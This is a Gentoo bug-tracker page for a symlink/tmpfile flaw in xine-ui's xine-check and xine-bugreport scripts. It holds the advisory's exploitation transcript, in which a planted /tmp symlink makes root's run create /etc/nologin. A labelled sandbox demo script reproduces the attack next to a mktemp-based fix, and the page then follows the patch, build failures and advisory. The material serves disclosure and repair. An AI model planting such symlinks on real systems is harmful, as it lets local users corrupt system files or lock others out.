Bug 45448 - media-video/xine-ui: Symlink/tmpfile bug in xine-check and xine-bugreport
Summary: media-video/xine-ui: Symlink/tmpfile bug in xine-check and xine-bugreport
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: GLSA Errors
Hardware: All All
Importance: Highest critical
Assignee: Gentoo Security
URL: http://nettwerked.mg2.org/advisories/...
Whiteboard:
Keywords:
Duplicates: 47737 47748 47749 47794 47811 47841
Depends on: 48107 48108
Blocks:
Reported: 2004-03-22 15:59 UTC by Tobias Weisserth
Modified: 2004-04-26 22:50 UTC
CC List: 12 users

See Also:
Package list:
Runtime testing required: ---


Attachments
add symlink checks to xine-check (& xine-bugreport) (xine-check.patch, 6.34 KB, patch) 2004-03-26 16:38 UTC, Julian Phillips

Description Tobias Weisserth 2004-03-22 15:59:59 UTC
Read the URL for details (http://nettwerked.mg2.org/advisories/xinebug). This got posted on bugtraq Saturday, 20/03/2004.

Reproducible: Always

Steps to Reproduce:
In the section of the xine-bugreport/xine-check script which assembles a bug report email, a symlink vulnerability exists due to an insecure file write of the finished bug report email template. This may allow an attacker to write to/corrupt sensitive system files, and in theory elevate privileges, although unlikely.

Actual Results:
Exploitation
#############

Below is an example exploitation scenario which I actually carried out on my system.

--- attack ---
[shaun@localhost shaun]$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
[shaun@localhost shaun]$ ln -s /etc/nologin /tmp/xine-bugreport

[...]

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
         You should definitely run xine as normal user, not root. Running it as
         root will expose you to some severe security issues.
         This script should run as the same user that you would use to run
         xine. If you run me as root (as you currently are), I cannot check
         if your real-life user has sufficient permissions...
         Unless you want to recheck something with root permissions, you should
         abort me now (press Ctrl-C) and run me from your usual account.
         press <enter> to continue...

[ good ] you're using Linux, doing specific tests

[ good ] looks like you have a /proc filesystem mounted.

[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
         The xine-config script can be used to deternime some file locations
         used by xine-lib, but you don't have such a script on your system.
         However, it looks like you installed xine from the RedHat packages.
         So I'll just guess that you are using the standard locations.
         If you want me to be sure about those file locations, you can install
         the 'xine-lib-devel' package (or 'xine-devel', depend on what packages
         you're using, which contains xine-config. However, this package is
         not really needed to run xine...
         press <enter> to continue...
[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
         /dev/dvd is the default device that xine uses for playing DVDs.
         You could make your life easier by creating a symlink named /dev/dvd
         pointing to your DVD device (something like /dev/scd0 or /dev/hdc).
         If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
         rm /dev/dvd
         ln -s hdb /dev/dvd
         typed as root will give you the symlink.
         Alternatively, you can configure xine to use the real device directly,
         using the setup dialog within xine, but I can't check your DMA
         settings in that case...
         press <enter> to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
         That means xine will have to to color space transformation and scaling
         in software, which is quite CPU intensive. Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...
[ hint ] Your X server doesn't support packed YUV overlays.
         That means xine will have to to color space transformation and scaling
         in software, which is quite CPU intensive. Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...
[ hint ] Your X server doesn't have any XVideo support...
         XVideo is an X server extension introduced by XFree86 4.x. This
         extension provides access to hardware accelerated color space
         conversion and scaling, which gives a great performance boost.
         If you have a fast (>1GHz) machine, you may be able to watch all
         kinds of video, anyway. You will waste lots of CPU cycles, though...
         press <enter> to continue...

Could you solve your xine problems using the previous hints? (y/n)?
'pardon?? neither yes nor no? assuming no...

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
         You should definitely run xine as normal user, not root. Running it as
         root will expose you to some severe security issues.
         This script should run as the same user that you would use to run
         xine. If you run me as root (as you currently are), I cannot check
         if your real-life user has sufficient permissions...
         Unless you want to recheck something with root permissions, you should
         abort me now (press Ctrl-C) and run me from your usual account.
         press <enter> to continue...

[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem mounted.
[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
         The xine-config script can be used to deternime some file locations
         used by xine-lib, but you don't have such a script on your system.
         However, it looks like you installed xine from the RedHat packages.
         So I'll just guess that you are using the standard locations.
         If you want me to be sure about those file locations, you can install
         the 'xine-lib-devel' package (or 'xine-devel', depend on what packages
         you're using, which contains xine-config. However, this package is
         not really needed to run xine...
         press <enter> to continue...

[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
         /dev/dvd is the default device that xine uses for playing DVDs.
         You could make your life easier by creating a symlink named /dev/dvd
         pointing to your DVD device (something like /dev/scd0 or /dev/hdc).
         If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
         rm /dev/dvd
         ln -s hdb /dev/dvd
         typed as root will give you the symlink.
         Alternatively, you can configure xine to use the real device directly,
         using the setup dialog within xine, but I can't check your DMA
         settings in that case...
         press <enter> to continue...

[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
         That means xine will have to to color space transformation and scaling
         in software, which is quite CPU intensive. Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...

[ hint ] Your X server doesn't support packed YUV overlays.
         That means xine will have to to color space transformation and scaling
         in software, which is quite CPU intensive. Maybe upgrading your
         X server will help here.
         If you have an ATI card, you'll find accelerated X servers on
         http://www.linuxvideo.org/gatos/
         press <enter> to continue...

[ hint ] Your X server doesn't have any XVideo support...
         XVideo is an X server extension introduced by XFree86 4.x. This
         extension provides access to hardware accelerated color space
         conversion and scaling, which gives a great performance boost.
         If you have a fast (>1GHz) machine, you may be able to watch all
         kinds of video, anyway. You will waste lots of CPU cycles, though...
         press <enter> to continue...

Could you solve your xine problems using the previous hints? (y/n)?
n

What kind of trouble does xine cause for you?

1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
please select (1..8): 8
please describe your xine problem briefly in _one_ line ( < 65 characters):
hello world

You should include a _complete_ copy of xine's output in your bug report.
Note, however, that there is a 40K limit on messages sent to the mailing list,
So you should strip down the parts that repeat over and over,
if there are any.
You can either copy&paste this output from the terminal where you ran xine,
or you can collect xine's output in a file named /tmp/xine.out, using
this command:
xine >/tmp/xine.out 2>&1
(assuming you have a Bourne compatible shell, like bash, for example)
If you need to add any parameters, you can do so...
This method is useful if you want to remove part of the output...
Which method would you prefer?
1) copy&paste
2) logfile /tmp/xine.out
please select (1..2): 2

please press <return> when you have the log ready in /tmp/xine.out

Hmmm, I could not read the /tmp/xine.out file.
Skipping this step.
You may add the output later, if this wasn't your intention...
         press <enter> to continue...

Okay. That's all I could guide you through...
I have assembled a skeleton for your bugreport in the file

   /tmp/xine-bugreport

You're strongly encouraged to add a detailed description of your problem.
Just look for 'additional description', and fill it in...

When you're finished, you can use your favourite mailer to send it to
<xine-user@lists.sf.net>. Please use this subject line, or something similar:
Subject: bug: hello world
Alternatively, I could try to send the bug report for you, using
/bin/mail -s "bug: hello world"
Please make sure to add the additional description before saying "yes"!
Do you want me to do this now? (y/n)?
n
Thanks for your bugreport! Have a nice day!

[...]

[shaun@localhost shaun]$ ls -al /etc/nologin
-rw-r--r--    1 root     root         1756 Mar 20 21:56 /etc/nologin
[shaun@localhost shaun]$
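The bug class in the report above, as an added example that is not code from xine-ui, the advisory or the Gentoo patch (the patch itself is not on this page). It reproduces the attack inside a throwaway directory: a report is written to a predictable name under a shared directory, the attacker plants a symlink at that name beforehand, and the script's redirection follows the link and creates the attacker's chosen target, exactly as the transcript shows for /etc/nologin. A hardened writer next to it refuses a planted link and creates the real file through mktemp. The sandbox directory, the stand-in target file and all function names are constructed for the demo and assume nothing about the real script beyond what the report states.

```shell
#!/bin/sh
# Added example, not code from xine-ui, the advisory or the Gentoo patch.
# Reproduces the symlink/tmpfile bug from this report inside a throwaway
# directory: the report is written to a predictable name under a shared
# directory, an attacker pre-creates a symlink there, and the write follows
# the link. The hardened writer beside it refuses a planted link and lets
# mktemp create the file. All paths below are constructed for the demo.

make_sandbox() {
    SANDBOX=$(mktemp -d "${TMPDIR:-/tmp}/xinedemo.XXXXXX") || return 1
    SHARED="$SANDBOX/tmp"            # plays the role of the shared /tmp
    TARGET="$SANDBOX/victim_file"    # stands in for /etc/nologin
    mkdir "$SHARED"
}

# Attacker step from the advisory: plant a symlink at the predictable name.
plant_symlink() {
    ln -s "$TARGET" "$SHARED/xine-bugreport"
}

# Vulnerable pattern: fixed name, plain '>' redirection. open(2) follows the
# symlink and creates or truncates whatever it points at, with the privileges
# of whoever runs the script (root in the advisory's transcript).
vulnerable_write_report() {
    printf 'Subject: bug: hello world\n' > "$SHARED/xine-bugreport"
}

# Hardened pattern:
#  1. refuse if anything, symlink included, already sits at the expected name
#     (-L is tested first because -e is false for a dangling link)
#  2. let mktemp create the real file (O_CREAT|O_EXCL, mode 0600, random suffix)
#  3. append to that file; the name was never predictable, so there is no
#     planted path for the redirection to follow
# Prints the path of the created file on success.
safe_write_report() {
    if [ -L "$SHARED/xine-bugreport" ] || [ -e "$SHARED/xine-bugreport" ]; then
        echo "refusing to write: $SHARED/xine-bugreport already exists" >&2
        return 1
    fi
    report=$(mktemp "$SHARED/xine-bugreport.XXXXXX") || return 1
    printf 'Subject: bug: hello world\n' >> "$report" || return 1
    printf '%s\n' "$report"
}

# Scenario 1: the advisory's attack against the vulnerable writer.
# Returns 0 when the planted link was followed and the target received the
# report text.
demo_vulnerable() {
    make_sandbox && plant_symlink || return 1
    vulnerable_write_report
    rc=1
    if [ -f "$TARGET" ] && grep -q 'Subject: bug' "$TARGET"; then rc=0; fi
    rm -rf "$SANDBOX"
    return $rc
}

# Scenario 2: the same attack against the hardened writer.
# Returns 0 when the write was refused and the target was never created.
demo_hardened_refuses() {
    make_sandbox && plant_symlink || return 1
    rc=1
    if ! safe_write_report 2>/dev/null && [ ! -e "$TARGET" ]; then rc=0; fi
    rm -rf "$SANDBOX"
    return $rc
}

# Scenario 3: hardened writer with no attacker present. Returns 0 when it
# produced a fresh regular file (not the predictable name) holding the report.
demo_hardened_normal() {
    make_sandbox || return 1
    rc=1
    report=$(safe_write_report) \
        && [ -f "$report" ] && [ ! -L "$report" ] \
        && [ "$report" != "$SHARED/xine-bugreport" ] \
        && grep -q 'Subject: bug' "$report" && rc=0
    rm -rf "$SANDBOX"
    return $rc
}

# Stand-alone run: report each scenario's outcome.
for scenario in demo_vulnerable demo_hardened_refuses demo_hardened_normal; do
    if "$scenario"; then echo "$scenario: behaved as expected"; else echo "$scenario: FAILED"; fi
done
```

The `-L`/`-e` test on its own is still a check-then-use race: an attacker can plant the link between the test and a later write to the fixed name. It is kept only to give a clear error; the protection comes from mktemp creating a file with an unpredictable name under O_EXCL, which is why the hardened writer never opens the predictable path at all. The same applies to the script's fixed /tmp/xine-check.log and /tmp/xine.out paths mentioned in the transcript.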
Comment 1 Joshua J. Berry (CondorDes) (RETIRED) gentoo-dev 2004-03-23 20:17:55 UTC
I can confirm this with xine-ui 0.9.23, but for some reason I can't get to the Xine website to see if an updated version has been released.
Comment 2 schaedpq 2004-03-26 02:34:43 UTC
Mhmm, I just looked at the xine website. The latest version is 1-rc3b, therefore there is apparently no fixed version available.
There is now an entry in bugtraqs vulnerability db: http://www.securityfocus.com/bid/9939/info/
Except for a list of vulnerable versions it doesn't seem to contain anything new.
Comment 3 solar (RETIRED) gentoo-dev 2004-03-26 03:35:30 UTC
I'm going to sleep now.. 
hopefully by the time I wake up one of you will have attached a patch (hint, hint)
Comment 4 solar (RETIRED) gentoo-dev 2004-03-26 14:05:50 UTC
No patch I see..

Ok how about this.. I assume this is a shell script.. with some blatant 
reference to /tmp.. If this is the case (shell script) could somebody
please upload it so that a patch may be created.

------------------------------------------------------------------
BTW: In the future please don't open a bug with the status of GLSA.
The product goes to GLSA after the bug is done being worked on in the 
portage system.
Thanks.
Comment 5 Julian Phillips 2004-03-26 16:38:03 UTC
Created attachment 28126 [details, diff]
add symlink checks to xine-check (& xine-bugreport)

This should stop xine-check/xine-bugreport blindly writing into symlinks for
the logfile, tmpfile or bugreport.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2004-04-07 08:31:57 UTC
Reassigning correct Product/component as the bug has not been worked out yet.
-K
Comment 7 Kurt Lieber (RETIRED) gentoo-dev 2004-04-08 08:02:02 UTC
media-video herd -- can you review/comment and apply the patch if appropriate?
Comment 8 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-13 06:05:00 UTC
Working on it... looks like I'm the only cowboy for this herd right now. Not a good state, if you have a look at the bug list :-(
Comment 9 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-13 06:35:12 UTC
Ok, all versions in CVS now are patched. Go ahead.
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 06:55:14 UTC
Patrick:

Your commit doesn't show up on CVSweb :
http://www.gentoo.org/cgi-bin/viewcvs.cgi/media-video/xine-ui/?hideattic=1#dirlist

Or do I have sync problems, or am I looking in the wrong package ?
Thanks for your work, media-video is a large herd to watch all alone :)

-K
Comment 11 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 09:52:02 UTC
OK I'm out of sync :)

Ready for a GLSA :
x86 should upgrade to xine-ui-0.9.21-r1
ppc should upgrade to xine-ui-0.9.13-r1
Comment 12 Derk W te Bokkel 2004-04-13 10:14:47 UTC
um .. build for xine-ui-0.9.23-r1 crashes and burns on the introduction of the patch.

emerge fragment...

make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/desktops'
Making all in visuals
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Nothing to be done for `all'.
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc/visuals'
make[3]: Entering directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
test `cd .; pwd` = `pwd` || cp ./xine-check.sh.in .
perl ./build-xine-check.pl ./xine-check.en
chmod a+x xine-check
ln -s xine-check xine-bugreport
ln: `xine-bugreport': File exists
make[3]: *** [xine-bugreport] Error 1
make[3]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23/misc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/extrabig/tmp/portage/xine-ui-0.9.23-r1/work/xine-ui-0.9.23'
make: *** [all] Error 2

!!! ERROR: media-video/xine-ui-0.9.23-r1 failed.
!!! Function src_compile, Line 43, Exitcode 2
!!! (no error message)

attempt to symlink finds a real file already there .. previous version (without -r1) installed fine 
Comment 13 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:17:13 UTC
*** Bug 47737 has been marked as a duplicate of this bug. ***
Comment 14 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:17:40 UTC
sorry guys, there's something wrong with this patch.
Comment 15 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 11:21:46 UTC
Hmm... going back to wait_for_ebuild
phosphan: your opinion on the problem ?

Someone with powers should remove the offending ebuild ?
Comment 16 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 11:36:39 UTC
i've also created a bug upstream
http://sourceforge.net/tracker/index.php?func=detail&aid=934417&group_id=9655&atid=109655
Comment 17 Derk W te Bokkel 2004-04-13 12:02:17 UTC
A minor subtlety .. my previous xine-ui-0.9.23.ebuild with the true-false patch added installed fine.. Apparently some changes had occurred since I last installed (had to use the ebuild copy out of /var/db in order to test). So some thing in the symlink patch is causing the file xine-bugreport to exist too soon perhaps? It is created seemingly before xine-check according to the time stamps ..
Comment 18 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 12:20:42 UTC
i've just commited a fix.
please test and report
Comment 19 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 13:28:48 UTC
*** Bug 47749 has been marked as a duplicate of this bug. ***
Comment 20 Derk W te Bokkel 2004-04-13 14:07:03 UTC
nope at this time it still does the same thing (ebuild time stamp 12:37 now instead of 6:33).. perhaps using a "ln -sf" would work but I don't know how to add that..
nothing seems to have changed (except a few quotes removed).. comparing the ebuilds .. perhaps it has not yet hit the mirrors?? 

Comment 21 Tim Burrell 2004-04-13 15:27:21 UTC
emerge -pu world broke on xine-ui install.  
Come on guys, get it together.  
This shouldn't be happening on the stable branch.

Just so I don't sound like a total ass:
Gentoo is great, and so are the people who help
make it happen.  Except for the odd time. :o).
Comment 22 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 15:31:49 UTC
*** Bug 47748 has been marked as a duplicate of this bug. ***
Comment 23 Martin Holzer (RETIRED) gentoo-dev 2004-04-13 15:36:23 UTC
it compiles here on both of my dev boxes
Comment 24 Derk W te Bokkel 2004-04-13 16:05:08 UTC
okay I can make it compile and install using the ebuild commands .. provided I clobber xine-bugreport "after unpack" (or rather after a failed emerge) and before compile, install and qmerge..
Comment 25 Derk W te Bokkel 2004-04-13 16:18:38 UTC
okay 

add the line

rm misc/xine-bugreport

as the first line inside the Braces of the src_compile routine in the ebuild and it all works ..

Comment 26 Ian Truelsen 2004-04-13 16:25:21 UTC
The src_compile alteration cured the problem for me.
Comment 27 Scott Taylor (RETIRED) gentoo-dev 2004-04-14 00:25:38 UTC
*** Bug 47794 has been marked as a duplicate of this bug. ***
Comment 28 Scott Taylor (RETIRED) gentoo-dev 2004-04-14 08:33:16 UTC
ack! what a pain this was... the misc/xine-bugreport is a symlink created by the
makefile. This file should not have appeared in the .22 tarball. The symlink-patch
tried patching both these original files. So, on .23 which properly did NOT have
the -bugreport file, the patch added it before the build. So the same problem
reappeared. It was a moving target. Fixing one broke the other. Both versions
listed below should work, and should have this security patch properly applied.

0.9.22-r2 (x86) and 0.9.23-r1 (~x86)
Comment 29 Derk W te Bokkel 2004-04-14 10:06:26 UTC
um .. the line

rm misc/xine-bugreport

is still needed for xine-ui-0.9.23-r1 to build completely .. something about the patching process is still creating a real xine-bugreport file before the symlinking happens so it chokes if the file is not clobbered..

derk
Comment 30 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 10:14:00 UTC
please clean your PORTAGE_TMPDIR="/var/tmp"
and try again
Comment 31 Derk W te Bokkel 2004-04-14 10:16:42 UTC
sorry still chokes after that.

note I also tried removing the actual patching of xine-bugreport from the patch file also trying to apply the patch to only xine-check or xine-check.sh.in but any patching still results in the creation of xine-bugreport in some fashion probably by the makefile config processes. Probably any kind of date stamp alteration (atime, mtime) is setting it off.
Comment 32 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 12:45:44 UTC
*** Bug 47811 has been marked as a duplicate of this bug. ***
Comment 33 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 12:47:36 UTC
xine-ui-0.9.23-r1.ebuild,v 1.3 cvs header fixes all issues

time to send out GLSA
Comment 34 ra 2004-04-14 12:58:39 UTC
Had this problem on two separate computers. Both fixed by using the suggestion here: http://bugs.gentoo.org/show_bug.cgi?id=45448#c25
Comment 35 Martin Holzer (RETIRED) gentoo-dev 2004-04-14 15:09:50 UTC
*** Bug 47841 has been marked as a duplicate of this bug. ***
Comment 36 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-14 23:33:27 UTC
Sorry for causing so much trouble, should've checked the side effects more thoroughly.
Comment 37 Thierry Carrez (RETIRED) gentoo-dev 2004-04-17 07:52:32 UTC
Two new vulnerabilities in xine-ui (#48108) and xine-lib (#48107) have just been submitted. A global GLSA will be published once all xine-* vulns are fixed.
Comment 38 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-19 01:43:38 UTC
xine-ui-0.9.23-r2 includes the patch from #48108.
Comment 39 Joshua J. Berry (CondorDes) (RETIRED) gentoo-dev 2004-04-26 22:50:09 UTC
GLSA 200404-20.